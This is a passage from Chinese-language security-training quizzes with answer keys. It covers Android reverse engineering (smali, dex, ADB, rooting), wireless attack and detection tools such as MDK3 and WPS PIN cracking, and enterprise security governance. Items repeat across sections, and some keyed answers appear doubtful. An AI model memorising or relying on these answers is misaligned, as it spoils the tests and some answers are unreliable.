标准答案: D

17、这句代码(compl-float v0,v2,v2)表达的是什么指令?

A、 比较指令

B、 跳转指令

C、 数据转换指令

D、 数据运算指令

标准答案: A

18、smali.jar编译工具哪个命令可以编译smali为dex文件?

A、 java -jar smali.jar -o HelloWorld.smali classes.dex

B、 java -jar smali.jar -o classes.dex HelloWorld.smali

C、 java -jar -o classes.dex HelloWorld.smali

D、 java -jar -export classes.dex HelloWorld.smali

标准答案: B

19、ApkToolKit工具可以把dex转换成jar包?

A、 对

B、 错

标准答案: A

20、使用哪款反编译工具查看jar文件内容?

A、 Java Decompiler

B、 ApkToolKit

C、 jdk

D、 smali.jar

标准答案: A

21、静态分析是运行程序后进行调试?

A、 对

B、 错

标准答案: B

22、安卓反编译后会出现$符号字节码表示是匿名内部类?

A、 对

B、 错

标准答案: A

23、反编译安卓应用后,一般应该先查看哪一个smali文件的代码?

A、 编译程序打开控制台

B、 打开匿名类smali文件

C、 打开加密解密smali文件

D、 Main最主要smali文件

标准答案: D

24、在整个工作中,无权限程序1发送广播到程序2,有权限的程序2不能让程序1下载文件。()

A、 对

B、 错

标准答案: B

25、哪个选项不是利用Activity劫持对系统进行恶意攻击的?

A、 遍历运行中的程序

B、 恶意程序启动带标志的钓鱼试Activity覆盖正常的Activity

C、 用户在伪造的界面上进行操作

D、 查杀恶意程序发送的信息

标准答案: D

26、程序加载的时候有两种视图,分别是链接视图和执行视图。

A、 对

B、 错

标准答案: A

27、Dex文件结构是一个.class集合,它会把.class里变量、符号和字符串放在池子里面,通过索引来使用,来压缩文件大小。()

A、 对

B、 错

标准答案: B

28、APK保护Anti引用有四个层面,分别为java、native、emulator和资源。()

A、 对

B、 错

标准答案: A

29、不是Anti Emulator检测的是?

A、 属性检测

B、 物理机文件检测

C、 基于cache行为检测

D、 基于代码指令执行检测

标准答案: B

30、DexClassData类分别定义信息里不包括的是?

A、 Method信息

B、 Code信息

C、 Attribute信息

D、 ClassDataHeadr信息

标准答案: C

31、Method ids索引是一个相对于前一个索引的增量,例如:第一个方法是0,第二个方法相对于第一个方法偏移1,就是1。第三个方法相对于第二个方法偏移是1,其实还是1,意思是往下递加。

A、 对

B、 错

标准答案: A

32、Dex加密使用shell的Dex替换原始的Dex,把原始的Dex当成资源或者附加数据进行隐藏。()

A、 对

B、 错

标准答案: A

33、下面不是替换ClassLoader时机的?

A、 ContentProvider:OnCreate()

B、 Application: BaseContext()

C、 Application:OnCreate()

D、 Application:attachBaseContext()

标准答案: B

34、EvilDownload程序发送一个广播到DownloadManager程序接收,拥有权限的DownloadManager程序,可以让EvilDownload程序去下载文件。()

A、 对

B、 错

标准答案: A

35、下面对名称替换的概念性说法有误的是?

A、 把程序里面有意义的类、方法和字段替换无意义随机文本

B、 无意义的随机文有自动还原方法

C、 替换人员识别

D、 用Proguard自动还原

标准答案: B

36、if-ge vA,vB,:cond_** 的意思是?

A、 如果vA大于vB则跳转到:cond_**

B、 如果vA大于等于vB则跳转到:cond_**

C、 如果vA小于vB则跳转到:cond_**

D、 如果vA小于等于vB则跳转到:cond_**

标准答案: B

37、在安卓逆向中经常用到的ADB全称是什么?

A、 Android DataBase

B、 Android Debug Bridge

C、 Asian Development Bank

D、 Apple Desktop Bus

标准答案: B

38、以下哪些功能不是ADB的常用功能?

A、 查看logcat日志

B、 端口转发

C、 shell命令

D、 hook进程

标准答案: D

39、以下命令中哪个是(使用ADB)安装apk的正确命令?

A、 adb install c:\file.apk

B、 adb uninstall c:\file.apk

C、 adb install my.app.client

D、 adb uninstall my.app.client

标准答案: A

40、安卓root的过程中需要对/system/bin/su设置什么权限?

A、 444

B、 755

C、 6755

D、 6444

标准答案: C

41、android中最高权限的用户是?

A、 administrator

B、 root

C、 system

D、 su

标准答案: B

42、android在root的过程中以下哪种说法是错误的?

A、 把su文件放到/system/bin/中

B、 设置/system/bin/su让管理员用户课运行

C、 superuser.apk放到system/app下面

D、 把su文件放到/system/xbin/中

标准答案: B

43、android系统中主要存放核心文件的目录是?

A、 \system\bin

B、 \system\framework

C、 \system\lib

D、 \system\etc

标准答案: B

44、ro.debuggable=1参数的意思系统中所有的程序允许调试?

A、 对

B、 错

标准答案: A

45、Ascii码53,57,49,48对应的数字是?

A、 5912

B、 5801

C、 5910

D、 6910

标准答案: C

46、以下哪个工具可以直接反编译DEX文件为Java源码?

A、 APK改之理

B、 JEB

C、 android逆向助手

D、 android killer

标准答案: B

47、APK改之理工具的“Dalvik Debug Monitor Service“功能一下说法错误的是?

A、 调试apk

B、 反汇编源码

C、 查看日志

D、 查看进行

标准答案: B

48、apktool反编译后其大部分文件后缀为?

A、 .c

B、 .java

C、 .smail

D、 .dalvik

标准答案: C

49、以下哪个不是java语言的内部类?

A、 成员内部类

B、 静态嵌套类

C、 匿名内部类

D、 函数内部类

标准答案: D

50、dalvik虚拟机对应的(文件格式)为.dex压缩格式

A、 对

B、 错

标准答案: A

1、下列关于WAIDPS的描述正确的是?

A、 WAIDPS是一个无线入侵检测工具

B、 WAIDPS是一个无线入侵工具

C、 WAIDPS是一个无线扫描工具

D、 WAIDPS是一个网站入侵检测工具

标准答案: A

2、WAIDPS在认证解除中检测攻击信息会存入下列哪项文件中?

A、 config.ini

B、 pktconfig.ini

C、 attacks

D、 pcap

标准答案: D

3、下列选项中破解wifi不需要握手包的是?

A、 wifi万能钥匙

B、 PIN码穷举

C、 字典破解

D、 WEP秘钥

标准答案: A

4、下列关于802.11a与802.11b描述有误的是 ?

A、 802.11a采用正交频分复用技术

B、 两种协议出现于1999年

C、 802.11a完全不可以适应无线电信号

D、 802.11b采用普遍使用的2.4赫兹频段技术

标准答案: C

5、常见的无线网卡运行模式有几种?

A、 4

B、 5

C、 6

D、 7

标准答案: C

6、下列关于无线pin码破解的描述错误的是____。

A、 WPS技术会随机产生一个8位数字的字符串作为PIN码

B、 PIN码会做对半处理,分前4位和后4位进行匹配

C、 前4位如果匹配错误的话直接drop请求

D、 后4位与前4位一样,前4位如果爆破通过在继续爆破后4位,最后通过认证。

标准答案: D

7、下列关于无线pin码破解的描述错误的是____。

A、 WPS技术会随机产生一个8位数字的字符串作为PIN码

B、 PIN码会做对半处理,分前4位和后4位进行匹配

C、 前4位如果匹配错误的话直接drop请求

D、 后4位与前4位一样,前4位如果爆破通过在继续爆破后4位,最后通过认证。

标准答案: D

8、无线局域网(WLAN)标准IEEE 802.11g规定的最大数据速率是____。

A、 1 Mb/s

B、 11 Mb/s

C、 5 Mb/s

D、 54 Mb/s

标准答案: D

9、在中国,无线载波信道的使用范围是____。

A、 1-11

B、 1-12

C、 1-13

D、 1-14

标准答案: C

10、四种管理帧中包含无线SSID信息的是____。

A、 关联帧

B、 认证帧

C、 探测帧

D、 信标帧

标准答案: D

11、MDK3 是一款无线DOS 攻击测试工具。

A、 正确

B、 不正确

标准答案: A

12、MDK3将可疑数据存入下列哪项文件以备进一步分析?

A、 PCAP

B、 CONFIG.INI

C、 py文件

D、 php文件

标准答案: A

13、MDK3 攻击的是无线AP。

A、 正确

B、 不正确

标准答案: A

14、MDK3可以用来检查隐藏接入点。

A、 正确

B、 不正确

标准答案: A

15、WAIDPS可以检测到MDK3的攻击。

A、 正确

B、 不正确

标准答案: A

16、WAIDPS攻击时会冒用MAC地址以隐藏自己。

A、 正确

B、 不正确

标准答案: A

17、WAIDPS检测到攻击会将攻击数据包详情储存到一个文件夹中以备分析。

A、 正确

B、 不正确

标准答案: A

18、Ascii码53,57,49,48对应的数字是?

A、 5912

B、 5801

C、 5910

D、 6910

标准答案: C

19、以下哪个工具可以直接反编译DEX文件为Java源码?

A、 APK改之理

B、 JEB

C、 android逆向助手

D、 android killer

标准答案: B

20、APK改之理工具的“Dalvik Debug Monitor Service“功能一下说法错误的是?

A、 调试apk

B、 反汇编源码

C、 查看日志

D、 查看进行

标准答案: B

21、apktool反编译后其大部分文件后缀为?

A、 .c

B、 .java

C、 .smail

D、 .dalvik

标准答案: C

22、以下哪个不是java语言的内部类?

A、 成员内部类

B、 静态嵌套类

C、 匿名内部类

D、 函数内部类

标准答案: D

23、dalvik虚拟机对应的(文件格式)为.dex压缩格式

A、 对

B、 错

标准答案: A

24、以下哪个类型不属于dalvik的原始数据类型?

A、 boolean

B、 float

C、 varchar

D、 short

标准答案: C

25、.registers指定了方法中寄存器的总数?

A、 对

B、 错

标准答案: A

26、cconst-wide/16 vx, lit16 的意思是存入int常量道vx,vx+1寄存器,扩展int型常量位long常量

A、 对

B、 错

标准答案: A

27、add-int a,b,c 位计算 a+b 并将结果存入c。

A、 对

B、 错

标准答案: B

28、sub-int/2addr a,b 为计算a-b并将结果存入a。

A、 对

B、 错

标准答案: A

29、以下哪个指令是无符号右移指令?

A、 ushr-int

B、 shr-long

C、 shr-int/2addr

D、 shr-long/2addr

标准答案: A

30、shl-long a,b,c代表左移b、b+1,c指定移动的位置,结果存入a,a+1。

A、 对

B、 错

标准答案: A

31、以下哪个类型转换指令为整型转换为字符串型?

A、 int-to-byte

B、 int-to-char

C、 int-to-short

D、 int-to-long

标准答案: B

32、以下那个是通过短偏移量无条件跳转到目标的指令?

A、 goto/8:goto_0

B、 goto32:goto_0

C、 goto/16:goto_0

D、 goto:goto_0

标准答案: D

33、使用http传输回来文件的下载地址和文件的md5能保证文件不会被替换

A、 对

B、 错

标准答案: B

34、如果被中间人劫持,但是下载安装的apk和手机上装的apk的包名一样,这时候会提示什么

A、 与已安装的程序签名不一致

B、 正常安装无提示

C、 程序已安装

D、 提示程序更新

标准答案: A

35、apk升级漏洞一般发生在什么情况下?( )

A、 APK自升级

B、 应用市场提示升级

C、 应用后台挂起时

D、 设备关机时

标准答案: A

36、APK加固在一定程度上有助于防止签名绕过?

A、 对

B、 错

标准答案: A

37、Android会把什么文件用私钥计算出签名, 然后将签名以及包含公钥信息的数字证书一同写入CERT.RSA 中保存?( )

A、 AndroidManifest.xml

B、 MANIFEST.MF

C、 CERT.RSA

D、 CERT.SF

标准答案: D

38、在保护APK文件不被修改时哪种验证不常见?()

A、 MD5校验

B、 签名校验

C、 文件名校验

D、 加固自校验

标准答案: C

39、动态注册的广播是导出的?( )

A、 对

B、 错

标准答案: A

40、以下选项中不算提权后危害的是?()

A、 数据泄露

B、 消息伪造

C、 钓鱼

D、 修补自身漏洞

标准答案: D

41、NanoHttpd核心的处理函数是什么?( )

A、 isAlive

B、 registerConnection

C、 serve

D、 getListeningPort

标准答案: C

42、哪种可以通过网络与Android应用通信?()

A、 PF_UNIX

B、 PF_INET

C、 PF_NETLINK

D、 pf_packet

标准答案: B

43、模型检测(model checking)是一种很重要的半自动验证技术

A、 对

B、 错

标准答案: B

44、模型检测(model checking)主要通过()或隐式不动点计算来验证有穷状态并发系统的模态/命题性质

A、 后台检测

B、 隐式状态搜索

C、 显式状态搜索

D、 数据匹配

标准答案: C

45、以下选项中不是模型检测(model checking)应用领域的是?

A、 大数据处理

B、 排工问题

C、 漏洞检测

D、 Monty hall Problem and Intel CPU

标准答案: A

46、强制攻击一般发现在什么情况下?

A、 APT攻击

B、 xss攻击

C、 sql注入

D、 暴力破解

标准答案: D

47、以下选择中不是用于应用分析的工具是?

A、 ida

B、 apkide

C、 loadpe

D、 lldb

标准答案: C

48、使用http传输回来文件的下载地址和文件的md5能保证文件不会被替换

A、 对

B、 错

标准答案: B

49、APK加固在一定程度上有助于防止签名绕过?

A、 对

B、 错

标准答案: A

50、动态注册的广播是导出的?( )

A、 对

B、 错

标准答案: A

1、下列关于信息安全CIA标准的描述错误的是____。

A、 保密性是指信息不能泄露给未授权者,确保合适的人看到信息

B、 完整性是指防止未授权更改

C、 可用性是指根据用户要求访问使用特性

D、 保密性可以通过使用散列、配置变更、访问控制、数字签名来实现

标准答案: D

2、”由于缺少灭火器材,而导致火灾的发生使计算机遭到破坏”对于这个安全事件的描述正确的是____。

A、 缺少灭火器材是安全威胁,计算机受到破坏是安全风险

B、 发生火灾是安全威胁,缺少灭火器材是安全脆弱性

C、 计算机遭到破坏是安全威胁,缺少灭火器材是安全脆弱性

D、 发生火灾时安全脆弱性,缺少灭火器材是安全风险

标准答案: B

3、下列对企业安全框架的描述错误的是____。

A、 企业信息安全框架要考虑企业的多样性。不同的企业信息安全的重点和关注点有所不同

B、 帮助解决不同部门之间的协同作业问题

C、 企业信息安全框架有三个要素分别是:安全管理、安全运维、安全技术建设

D、 企业安全框架就是一种全方位的安全防御系统

标准答案: D

4、下列对于TOGAF框架的描述错误的是____。

A、 实现了一个迭代步骤方法

B、 实现了企业连续统一

C、 实现了产品快速高效开发

D、 实现了架构能力管理

标准答案: C

5、下列对于SABSA模型描述错误的是____。

A、 企业信息安全结构开发的模型和方法论

B、 包括战略、概念、实施、度量、审计层次

C、 类似于Zachman,但从安全角度定义需求

D、 是一种迭代模型

标准答案: D

6、下列不属于Cobit模型中业务目标的准则的是____。

A、 有效性

B、 机密性

C、 统一性

D、 完整性

标准答案: C

7、以下选项中哪一项不是ITIL模型的核心?

A、 服务设计

B、 服务操作

C、 服务优化

D、 服务转换

标准答案: C

8、在企业中 ,安全开发人员架构不包括以下哪一项?

A、 监控开发

B、 众测

C、 安全产品开发

D、 开发安全

标准答案: B

9、下列选项中对于企业安全开发人员的职能描述正确的是?

A、 策略标准的制定

B、 业务系统环境安全测试

C、 系统安全加固

D、 根据企业的安全需求开发定制安全产品

标准答案: D

10、下列选项中对风险管理团队的工作描述错误的是?

A、 量化威胁的可能性及对业务的影响

B、 记录和识别风险过程于措施

C、 对员工进行安全意培训

D、 开发衡量标准,及管理各种风险

标准答案: A

11、下列选项中对于信息安全委员会的信息安全管理员的岗位职责描述错误的是?

A、 推广企业信息安全策略,给出安全管理指南

B、 代表本专业、本部门独立客观发表评审意见

C、 决策公司安全规划方向

D、 定期审阅并及时更新信息安全管理策略

标准答案: C

12、下列选项中不是ISO27001安全属性的是?

A、 保密性

B、 完整性

C、 可用性

D、 持续性

标准答案: D

13、SOA适用性声明ISO27001:2013中的介质处理不包括以下哪个选项?

A、 可移动介质的管理

B、 介质的处理

C、 访问控制策略

D、 物理介质传输

标准答案: C

14、下列选项中对于安全策略的描述错误的是?

A、 为达到特定目标而执行的详细步骤

B、 满足公司所有法律法规

C、 根据组织变化迭代发布版本

D、 表达专业和重要性,不含无法理解语言陈述

标准答案: A

15、个人工作经历数据属于信息分类的哪一级别?

A、 公开

B、 隐私

C、 敏感

D、 机密

标准答案: B

16、身份标识的主体不包括以下哪个选项?

A、 令牌

B、 用户

C、 程序

D、 系统

标准答案: A

17、物理安全中入侵破坏的响应对策不包括____。

A、 警察

B、 消防

C、 医务

D、 警示

标准答案: D

18、网络数据使用哪种接口进行传输

A、 RJ11

B、 RJ45

C、 RJ12

D、 RJ48

标准答案: B

19、语音数据传输采用哪种线缆材料传输

A、 4芯

B、 5芯

C、 6芯

D、 5类非屏蔽线

标准答案: A

20、工程布线设计应采用什么方式完成走线

A、 上走线

B、 下走线

C、 弱电间

D、 机柜内

标准答案: A

21、企业布线过程中,机房不需要布设语音点

A、 对

B、 错

标准答案: B

22、UPS的总开关跟其他的开关保持

A、 相连

B、 独立

C、 级联备份

标准答案: B

23、当市电断电后再保持供电的UPS是哪种

A、 在线式

B、 后备式

C、 在线互动式

标准答案: B

24、UPS关机步骤应该是

A、 先将UPS面板关机,使UPS处于旁路工作继续对电池供电,再逐个关掉负载,最后完全断电

B、 逐个关闭负载,再将UPS面板关机,然后再将UPS完全关闭,断开市电

C、 断开市电,再将UPS面板关机,逐个关闭负载,最后再关UPS

标准答案: B

25、在使用UPS的情况下,开关设备的时候,应当所有设备一起打开,这样会保证系统的同步运行

A、 对

B、 错

标准答案: A

26、标准确认书应该包含有什么需求

A、 测试需求

B、 系统需求

C、 软件需求

标准答案: A

27、在工程实施之前,验收方可以不给施工方弱电布线图纸,但施工结束后必须有图纸

A、 对

B、 错

标准答案: B

28、在OSI七层协议中,提供一种建立连接并有序传输数据的方法的层是

A、 传输层

B、 表示层

C、 会话层

D、 应用层

标准答案: C

29、网络中端口与端口之间连接所用的层是

A、 网络层

B、 表示层

C、 应用层

D、 传输层

标准答案: D

30、IPV4是32位网络地址

A、 对

B、 错

标准答案: A

31、在无线协议里面,能够达到54Mbps/2.4GHz频段的协议类型是

A、 802.11 x

B、 802.11 a

C、 802.11 g

D、 802.11 I

标准答案: C

32、在云技术服务里,支持软件云服务,按权限访问特定应用的技术是

A、 SaaS

B、 IaaS

C、 PaaS

标准答案: A

33、代表非盈利性组织的域名是

A、 COM

B、 ORG

C、 NET

D、 INT

标准答案: B

34、在现代网络中3g网络的频谱能达到1800MHz

A、 对

B、 错

标准答案: B

35、保存着路由器上当前IOS版本的介质是

A、 ROM

B、 RAM

C、 Flash

D、 NVRAM

标准答案: C

36、哪种存储介质掉电后数据不易丢失

A、 ROM

B、 NVRAM

C、 Flash

标准答案: B

37、在CISCO命令行界面中只有一个#的模式表示什么

A、 enable模式

B、 用户模式

C、 配置模式

标准答案: A

38、一般路由器界面中,有两级访问权限,用户级和特权级

A、 对

B、 错

标准答案: A

39、配置默认路由正确的命令是

A、 R1(config-if)#ip route 0.0.0.0 100.0.0.2

B、 R1(config-if)#ip route 0.0.0.0 0.0.0.0 100.0.0.2

C、 R1(config-if)#ip route 100.0.0.2 0.0.0.0

D、 R1(config-if)#ip route 100.0.0.2 0.0.0.0 0.0.0.0

标准答案: B

40、有几个RFC定义了IPsec的核心

A、 一个

B、 两个

C、 三个

D、 四个

标准答案: C

41、当一个路由器接收到发往另一个路由器的内部网络报文时,IPSEC暂不会被启动,只有当传输数据时才会启动

A、 对

B、 错

标准答案: B

42、以下哪种描述是ntdp协议的作用

A、 时间同步

B、 收集网络拓扑信息

C、 网络扫描工具

标准答案: B

43、ACL的作用是什么

A、 控制网络服务质量

B、 访问控制列表

C、 增强内部网关路由协议

D、 地址解析协议

标准答案: B

44、路由器命令中全双工配置命令是

A、 duplex full

B、 duplex auto

C、 duplex half

标准答案: A

45、密码学家对以下属于高频字母的分类是

A、 D,L,U,C,M

B、 P,F,Y,W,G,B,Y

C、 E,T,A,O,N,I,R,S,H

标准答案: C

46、近代密码学的理论主要手段是替代和换位

A、 对

B、 错

标准答案: A

47、密码管理过程中唯一要保护的是

A、 密钥

B、 算法

C、 加密方法

标准答案: A

48、密码学转换技术里的雪崩效应是指

A、 算法用于确保加密过程中不会产生某种模式的随机值。与密钥一同使用,传输时不用加密

B、 与扩散类似,算法输入值轻微的变化会引起输出值的显著变化

C、 明文加密之前对其把明文的最后一个块增加到每一块需要的长度

标准答案: B

49、已知明文攻击的方法是

A、 攻击者选择特定明文发给受害者,待受害者加此明文发送出去后,再截

B、 攻击者拥有一条或多条消息的明文和相对应的密文

C、 通过搜集外部的信息来分析进行攻击

标准答案: B

50、何种加密类型是128位分组,密钥长度可为128,192,256,进行16轮运算

A、 CAST

B、 IDEA

C、 Twofish

标准答案: C

1、针对哈希算法的攻击方式是

A、 暴力攻击

B、 信息载荷

C、 数学分析

标准答案: A

2、消息分组为512位,产生128位的散列值是哪种密码技术

A、 RSA

B、 ECC

C、 MD5

标准答案: C

3、AES算法,要求是分组算法,支持128,192,256密钥长度

A、 对

B、 错

标准答案: A

4、哪种属于业务过程中的无限事件

A、 台风洪水

B、 网络中断

C、 信息损失

D、 交通瘫痪

标准答案: A

5、业务连续性发生中断的时候最大的影响是哪种行业

A、 医疗

B、 能源

C、 媒体

标准答案: B

6、BCP的活动包括哪个

A、 分配责任

B、 物流统计

C、 工程管理

标准答案: A

7、属于业务影响分析的是

A、 BCP

B、 BIA

C、 DRP

D、 ISO

标准答案: B

8、以下哪个是平均故障间隔时间

A、 MTTR

B、 MTBF

C、 MTBD

标准答案: B

9、BCP的策略过程包括建立技能和培训工作,帮助制定各种连续性选项

A、 对

B、 错

标准答案: B

10、包含政策,组织,业务,资源的国际标准是

A、 BCP

B、 BS25999-2

C、 IEC27031

D、 DRI

标准答案: B

11、BS25999是关于什么的标准

A、 英国BSI业务连续性管理

B、 国际协会专业实践

C、 业务连续性有序实践

标准答案: A

12、DRI是用来取代ISO22301国际标准的

A、 对

B、 错

标准答案: B

13、OWASP Mobile Risks里的设备信息未保护是属于哪一项

A、 密码破解

B、 意外的数据泄漏

C、 同过不可信输入进行安全决策

D、 不安全的数据存储

标准答案: D

14、哪种情况属于软件出现开发问题的时候使软件进入冷重启加载

A、 发生一个内核故障,以受控的方式关闭系统

B、 以不受控方式出现之后

C、 一个意外内核或介质故障

标准答案: C

15、在开发安全里,哪种属于软件的脆弱性测试

A、 不得明文方式传送命令数据

B、 内核缺陷

C、 软件的许可问题

标准答案: B

16、在软件开发阶段,安全没有纳入重要考虑因素是安全隐患来源

A、 对

B、 错

标准答案: A

17、数据库模型当中,属于层次数据库的是

A、 组合逻辑树结构中相关联的记录和字段如LDAP

B、 使用属性行和元组列来包含组织信息是广泛的模型

C、 设计为管理多种不同类型的数据

D、 允许每个数据元素用于多个父节点和子记录

标准答案: A

18、哪种是第二代编程语言

A、 机器语言

B、 汇编语言

C、 自然语言

标准答案: B

19、在web开发过程中对于用户要操作重要的操作建议采用

A、 密码要小于6位方便记忆

B、 验证码使用后不要失效

C、 接受短信验证码

标准答案: C

20、确定目标,识别解决风险,开发和测试,计划下次迭代的是哪种开发模型

A、 增量模型

B、 原型模型

C、 螺旋模型

标准答案: C

21、分析和快速设计是增量模型中的一种

A、 对

B、 错

标准答案: B

22、瀑布式模型一般分为几个阶段

A、 4个

B、 3个

C、 2个

D、 1个

标准答案: A

23、传统项目中不包含单元测试

A、 对

B、 错

标准答案: B

24、最好的架构,需求和设计出自于

A、 团队

B、 经理

C、 设计

标准答案: A

25、敏捷不是指下面的哪一种

A、 方法论

B、 价值观

C、 原则

标准答案: A

26、公司治理模型中 COSO 和 Cobit的关系正确的是?

A、 COSO 模型和 CobiT 模型一样重要

B、 CobiT 模型比 COSO 模型重要

C、 COSO 模型比 CobiT 模型重要

D、 COSO 模型是 CobiT 模型的一部分

标准答案: C

27、COSO 是 IT 风险控制模型是否正确?

A、 对

B、 错

标准答案: B

28、在开发过程中,对于已经做过的事情,进行重复性利用,属于CMMI模型中的哪一级?

A、 初始级

B、 已管理级

C、 已定义级

D、 量化管理级

标准答案: B

29、ITIL 模型是一套应用于IT服务管理的实践标准是否正确?

A、 对

B、 错

标准答案: A

30、不属于渗透工程师主要职能的有?

A、 新产品的安全测试

B、 调研要测试目标的信息

C、 修改测试产品出现的错误

D、 出具测试报告及修复方案

标准答案: C

31、CXO 并不需要承担公司法律及业务责任是否正确?

A、 对

B、 错

标准答案: B

32、对企业员工进行安全意识培训属于以下哪一团队职责?

A、 风险管理团队

B、 风险测试团队

C、 风险分析团队

D、 风险评估团队

标准答案: A

33、风险分析团队需要对风险造成的影响和对策的成本之间达到预算平衡的效果,是否正确?

A、 对

B、 错

标准答案: A

34、以下说法错误的是?

A、 信息安全管理员有责任推广企业信息安全策略,给出安全管理指南

B、 信息安全主任委员有权利决策公司安全规划方向

C、 信息安全委员秘书负责组织安拍和召集评审会议、会议记录

D、 信息安全委员秘书可以决策公司安全规划方向

标准答案: D

35、信息安全委员会有权对各部门的资源访问权限做限制,是否正确?

A、 对

B、 错

标准答案: A

36、ISO27001:2005 的内容不包括:

A、 安全方针

B、 访问控制

C、 资产管理

D、 产品发布

标准答案: D

37、ISO27001:2013 标准内容包括14个领域和113个控制措施,是否正确?

A、 对

B、 错

标准答案: A

38、SOA适用性声明ISO27001中提到的物理环境安全不包括以下哪一项?

A、 物理入口控制

B、 密码策略

C、 办公室、房间和设施的安全保护

D、 公共访问、交接区安全

标准答案: B

39、在SOA适用性声明ISO27001中,网络服务的安全属于网络安全管理中的一部分,是否正确?

A、 对

B、 错

标准答案: A

40、以下步骤不属于ISMS模型的有哪一项?

A、 实施所选的控制措施以满足控制目标

B、 对ISMS实施可识别的改进

C、 对项目进行检测、控制

D、 定义ISMS策略、范围

标准答案: C

41、ISMS模型中的 CHECK ,是指定义ISMS策略、范围,是否正确?

A、 对

B、 错

标准答案: B

42、以下属于信息所有者应承担的责任的是?

A、 接受企业风险级别,承担风险首责

B、 策略控制失效首责

C、 监控、分析、变更事项首责

D、 本职工作数据安全责任

标准答案: D

43、员工的工作经历在信息分类中属于隐私信息,是否正确?

A、 对

B、 错

标准答案: A

44、以下属于性能测试的是哪一项?

A、 硬盘性能

B、 虚拟机配置

C、 数据库管理

D、 应用配置

标准答案: A

45、建立策略目录树,可以方便信息安全策略的规划和实施,是否正确?

A、 对

B、 错

标准答案: A

46、以下对SSO验证说法正确的是哪一项?

A、 根据用户已知的内容进行验证,如密码

B、 根据用户拥有的物品进行验证,如钥匙

C、 根据用户身份进行验证,如指纹

D、 通过一个合法授权管理访问多个授权系统

标准答案: D

47、身份验证是一种执行策略,是否正确?

A、 对

B、 错

标准答案: A

48、访问控制模型不包括以下哪一项?

A、 自主访问控制

B、 强制访问控制

C、 角色型访问控制

D、 访客访问控制

标准答案: D

49、Bell-LaPadula 模型中的强星型规则是指,一个主体只能在一个安全级别上执行,是否正确?

A、 对

B、 错

标准答案: A

50、以下不属于技术实践威胁的是?

A、 文档下载

B、 字典攻击

C、 登录欺骗

D、 网络钓鱼

标准答案: A

1、进行密码爆破属于字典攻击,是否正确?

A、 对

B、 错

标准答案: A

2、以下哪项不属于企业安全环境中的物理安全?

A、 配电系统

B、 墙壁和天花板建筑材料

C、 外围组件

D、 钓鱼页面

标准答案: D

3、在企业工作环境物理安全中,墙壁天花板的材料选用、防火等级、承重并不重要,是否正确?

A、 对

B、 错

标准答案: B

4、视频中提到,液体(石油)在火灾级别中属于哪一类?

A、 A类

B、 B类

C、 C类

D、 D类

标准答案: B

5、为了保护计算机和数据要定期对计算机做数据备份,是否正确?

A、 对

B、 错

标准答案: A

6、下面那个选项不是企业信息安全范围三大控制的():

A、 管理控制

B、 物理控制

C、 虚拟控制

D、 技术控制

标准答案: C

7、国际通用CIA准则环境三角那个不是():

A、 保密性

B、 完整性

C、 实践性

D、 可用性

标准答案: C

8、企业信息安全范围三大控制中,管理控制包括风险管理、安全治理、操作安全、法律法规、业务连续行控制和灾难格式计划。()

A、 对

B、 错

标准答案: B

9、下面对安全风险的定义不正确的是():

A、 缺少安全措施的一种缺陷

B、 利用识别脆弱性不会带来安全威胁

C、 显示一个脆弱性的列子

D、 威胁主体利用脆弱性带来的影响

标准答案: B

10、通过资产价值,威胁价值来赋值划分安全等级错误的是():

A、 6,高

B、 4~5,高

C、 1~3,低

D、 4~5,中

标准答案: B

11、信息安全定义属性有风险、暴露、威胁和脆弱性。()

A、 对

B、 错

标准答案: A

12、企业信息框架、信息安全规划所有部门沟通正确的是():

A、 说的一些事情、术语不一样,业务纯利润、保值投资策略,产品,业务无风险

B、 利用信息安全框架模型组织共鸣,来组织有共同的话题、方向和内容

C、 业务一般都理解你技术花在方案上

D、 技术一般都理解业务这个利润的价值和谁在做怎样的事情

标准答案: B

13、根据安全人员架构不是安全职能的是():

A、 安全教育培训

B、 审计部门

C、 执行管理者:CXO

D、 安全管理者:CIO、CISO、CTO

标准答案: A

14、CXO不包括CIO/CISO/CSO/CPO/CTO这些企业安全架构。()

A、 对

B、 错

标准答案: B

15、通用安全模型ISO27001安全属性黄金三角正确的是():

A、 完整性:未授权者能对信息更改

B、 保密性:信息不能泄露给未授权者,确保那些适合的人能访问或看到信息

C、 保密性:信息泄露能给未授权者,也可以访问或看到信息

D、 可用性:用户要求访问使用特性,不用确保授权人在使用信息

标准答案: B

16、通用安全模型ISO27001能给未授权者访问到信息,更改信息和使用信息。()

A、 对

B、 错

标准答案: B

17、企业的安全标准,战术目标说法正确的是():

A、 强制性活动,动作或规划,确保组织机构之间同意方式

B、 违反战术的标准内容

C、 做到和不支持策略的战术工具

D、 所谓的标准不需要满足策略存在的战术工具

标准答案: A

18、下面对措施说法错误的是():

A、 措施不是为项目、计划任务而存在的

B、 为完成步骤,制定的人员,范围,活动

C、 为达到特定目标而执行的详细步骤

D、 措施包括自定完成事情的时间,自定完成任务的时候需要详细阶段与步骤

标准答案: A

19、基准是设定一些标准安全,不能触碰、超越的底线,定义所需要的最低保护级别。()

A、 对

B、 错

标准答案: A

20、指南是为达到特定目标而执行的详细步骤,不便于搭建服务器、中间件和自定文档。()

A、 对

B、 错

标准答案: B

21、主体访问客体步骤正确的是():

A、 身份标识,身份验证,授权,访问资源,问责

B、 用户,授权,程序,系统。

C、 密码短语,密钥,个人身份证(PIN),令牌,访问资源

D、 身份标识,主体凭证,身份验证,授权,问责

标准答案: A

22、访问控制是一种安全手段,主体即一个虚体,客体是被访问信息或被访问实体,访问指主体和客体之间的信息流动。()

A、 对

B、 错

标准答案: B

23、主体和客体之间理解,主动去访问电脑、应用的是主体,被访问的文件、磁盘是客体。()

A、 对

B、 错

标准答案: A

24、企业常见身份标识技术有ID、用户名、AD域控、行为管理设备、账号、LDAP。()

A、 对

B、 错

标准答案: A

25、通过观景、入口、设施社区布局、照明等条件模式来预防犯罪。()

A、 对

B、 错

标准答案: A

26、在车库内、楼梯间和电梯使用玻璃窗能让犯罪者打消作案心里想法。()

A、 对

B、 错

标准答案: A

27、TOGAF框架需求管理迭代步骤方法正确的是():

A、 架构愿景,业务架构,信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理

B、 预备阶段,架构能力管理,架构愿景,业务架构,信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理

C、 信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理

D、 构架变更管理,实施治理,迁移规划,机会及解决方案,,技术架构,信息系统架构

标准答案: A

28、Zachman企业框架方向和设计都是采用纵横坐标。()

A、 对

B、 错

标准答案: A

29、Zachman模型不是基于人来开发的一个模型框架。()

A、 对

B、 错

